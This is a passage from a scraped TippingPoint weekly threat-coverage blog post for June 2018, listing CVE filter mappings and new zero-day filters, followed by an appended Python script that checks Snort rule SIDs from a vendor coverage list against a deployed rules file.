Exploitation Unlikely \nCVE-2018-8213 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8214 | 32127 | \nCVE-2018-8215 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8216 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8217 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8218 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8219 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8221 | | Vendor Deemed 
Reproducibility or Exploitation Unlikely \nCVE-2018-8224 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8225 | 32029 | \nCVE-2018-8226 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8227 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8229 | 32030 | \nCVE-2018-8231 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8233 | 32034 | \nCVE-2018-8234 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8235 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8236 | 32054 | \nCVE-2018-8239 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8243 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8244 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8245 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8246 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8247 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8248 | 32032 | \nCVE-2018-8249 | 32038 | \nCVE-2018-8251 | 32068 | \nCVE-2018-8252 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8254 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8267 | 32065 | \n \n \n\n**Zero-Day Filters**\n\nThere are six new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. 
You can also follow the Zero Day Initiative on Twitter [@thezdi](<https://twitter.com/thezdi>) and on their [blog](<https://www.zerodayinitiative.com/blog>).\n\n**_Foxit (2)_**\n\n * 31967: HTTP: Foxit Reader resolveNode Use-After-Free Vulnerability (ZDI-18-339)\n * 31969: HTTP: Foxit Reader boundItem Use-After-Free Vulnerability (ZDI-18-353)\n\n**_Microsoft (3)_**\n\n * 31953: HTTP: Microsoft Windows VBScript Join Function Memory Corruption Vulnerability (ZDI-18-297)\n * 31955: HTTP: Microsoft Windows Font Memory Corruption Vulnerability (ZDI-18-293)\n * 31970: HTTP: Microsoft Windows JScript defineProperty Use-After-Free Vulnerability (ZDI-18-298)\n\n**_OMRON (1)_**\n\n * 31965: HTTP: OMRON CX-Supervisor SCS File Parsing Buffer Overflow Vulnerability (ZDI-18-261)\n\n**Missed Last Week\u2019s News?**\n\nCatch up on last week\u2019s news in my [weekly recap](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-june-4-2018/>).\n\nThe post [TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 11, 2018](<https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-june-11-2018/>) appeared first on [](<https://blog.trendmicro.com>).", "modified": "2018-06-15T12:39:57", "published": "2018-06-15T12:39:57", "id": "TRENDMICROBLOG:F2BD1E9071121715A43D46B35B2E97A7", "href": "https://blog.trendmicro.com/tippingpoint-threat-intelligence-and-zero-day-coverage-week-of-june-11-2018/", "type": "trendmicroblog", "title": "TippingPoint Threat Intelligence and Zero-Day Coverage \u2013 Week of June 11, 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
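The Talos coverage note in the entries above gives its Snort rule SIDs as a comma-separated list of single values and `lo - hi` ranges. A defender who wants to confirm that those rules actually reached the sensor has to expand that notation and look each SID up in the deployed ruleset. The following is an added example, not code from Symantec, Talos or Trend Micro: it expands the SID list exactly as printed above and checks a rules file for each SID, reporting which rules are present and enabled, present but commented out, and missing. The rules file contents are a constructed sample written for this example, not real Talos rules; the SID list is the one on the page.

```python
import re
from typing import Dict, Set

# SID list as printed in the Talos coverage section above.
TALOS_SIDS = "45628, 46927 - 46930, 46933 - 46935, 46938 - 46945, 46951 - 46958, 46961 - 46962"

# Constructed sample rules file (not a real Talos ruleset): two enabled
# rules, one disabled (commented-out) rule, and one unrelated local rule.
SAMPLE_RULES = """\
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"sample enabled"; flow:to_client,established; sid:45628; rev:3;)
# alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"sample disabled"; sid:46927; rev:1;)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"sample enabled"; sid:46930; rev:1;)
alert tcp any any -> any any (msg:"unrelated local rule"; sid:1000001; rev:1;)
"""

# One token of the SID list: "45628" or "46927 - 46930" (whitespace tolerated).
_RANGE = re.compile(r"^\s*(\d+)\s*(?:-\s*(\d+))?\s*$")
# The sid option inside a rule body, e.g. "sid:46927;".
_SID = re.compile(r"\bsid\s*:\s*(\d+)\s*;")


def expand_sids(spec: str) -> Set[int]:
    """Expand 'a, b - c, ...' into the set of integer SIDs it denotes.

    Rejects tokens that do not parse and descending ranges, so a typo in
    a coverage list fails loudly instead of silently shrinking the check.
    """
    sids: Set[int] = set()
    for part in spec.split(","):
        m = _RANGE.match(part)
        if not m:
            raise ValueError(f"unparseable SID token: {part!r}")
        lo = int(m.group(1))
        hi = int(m.group(2)) if m.group(2) else lo
        if hi < lo:
            raise ValueError(f"descending range: {part!r}")
        sids.update(range(lo, hi + 1))
    return sids


def index_rules(rules_text: str) -> Dict[int, bool]:
    """Map every SID found in a rules file to True (enabled) or False (commented out)."""
    state: Dict[int, bool] = {}
    for line in rules_text.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        m = _SID.search(stripped)
        if not m:
            continue
        enabled = not stripped.startswith("#")
        sid = int(m.group(1))
        # A SID listed both enabled and disabled counts as enabled.
        state[sid] = state.get(sid, False) or enabled
    return state


def coverage_report(spec: str, rules_text: str) -> Dict[str, Set[int]]:
    """Classify each SID from the vendor list against the deployed rules file."""
    wanted = expand_sids(spec)
    have = index_rules(rules_text)
    return {
        "enabled": {s for s in wanted if have.get(s) is True},
        "disabled": {s for s in wanted if have.get(s) is False},
        "missing": {s for s in wanted if s not in have},
    }


if __name__ == "__main__":
    # On a real sensor, read rules_text from the deployed .rules files instead.
    report = coverage_report(TALOS_SIDS, SAMPLE_RULES)
    for key in ("enabled", "disabled", "missing"):
        print(f"{key}: {sorted(report[key])}")
```

Against the constructed sample the list expands to 26 SIDs, of which only 45628 and 46930 are enabled, 46927 is present but commented out, and the remaining 23 are absent, which is exactly the situation a stale SRU or rule pack would leave a sensor in. Concatenating every deployed `.rules` file into `rules_text` turns this into a post-update check for any vendor coverage note written in the same notation.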